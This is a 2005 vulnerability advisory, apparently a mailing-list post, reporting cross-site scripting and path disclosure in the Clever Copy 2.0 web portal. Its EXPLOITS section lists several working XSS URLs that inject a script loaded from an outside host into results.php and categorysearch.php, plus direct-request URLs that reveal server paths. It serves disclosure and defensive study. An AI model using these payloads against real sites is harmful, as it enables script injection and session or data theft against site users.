################################################
Clever copy Path disclosure and multiple XSS
vendor url:http://clevercopy.bestdirectbuy.com
advisory:http://lostmon.blogspot.com/2005/07/
clever-copy-path-disclosure-and-xss.html
vendor notify: yes exploit available:yes
################################################

Clever Copy is a free, fully scalable web site portal and news posting
system.You can run it as a very simple blog or ramp it up to a full
Content Management System

Clever Copy contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
'searchtype' and 'searchterm' variables upon submission to
'results.php' and 'categorysearch.php' scripts.This could allow a user
to create a specially crafted URL that would execute arbitrary code in
a user's browser within the trust relationship between the browser and
the server, leading to a loss of integrity

##############
VERSIONS
##############

Clever Copy version 2.0a
Clever Copy version 2.0

##############
SOLUTION
##############

No solution at this time

##############
TIMELINE
##############

Discovered: 15-07-2005
Vendor notify: 18-07-2005
Vendor response: 18-07-2005
Disclosure: 19-07-2005

##############
EXPLOITS
##############

http://[VICTIM]/results.php?searchtype="><script src="
http://www.drorshalev.com/dev/injection/js.js"></script>
category&searchterm=Announcements

http://[VICTIM]/results.php?searchtype=category&searchterm=">
<scriptsrc="http://www.drorshalev.com/dev/injection/js.js&
quot;></script>Announcements


http://[VICTIM]/results.php?start=0&searchtype="><script
src="http://www.drorshalev.com/dev/injection/js.js"><
/script>category&searchterm=Announcements

http://[VICTIM]/results.php?start=0&searchtypecategory&searchterm=
Announcements="><script src="http://www.drorshalev
.com/dev/injection/js.js"></script>

http://[VICTIM]/categorysearch.php?star=0&searchtype="><
script src="http://www.drorshalev.com/dev/injection/js.js
"></script>category&searchterm=Announcements

http://[VICTIM]/categorysearch.php?star=0&searchtypecategory&
searchterm=Announcements"><script src="http://
www.drorshalev.com/dev/injection/js.js"></script>

################################
direct request path disclosure:
################################

http://[VICTIM]/ticker.php
http://[VICTIM]/menu.php
http://[VICTIM]/banned.php
http://[VICTIM]/endlayout.php
http://[VICTIM]/randomhlinesblock.php
http://[VICTIM]/showlast.php
http://[VICTIM]/showlast5class1.php
http://[VICTIM]/showlast5phorum.php
http://[VICTIM]/showlast5phorumblock.php
http://[VICTIM]/showlastforumbb2.php
http://[VICTIM]/showlastforumbb2block.php


######################## €nd #############################

Thnx to estrella to be my ligth
thnx to http://www.drorshalev.com for hosting 'js.js'  script
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....


-- 
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....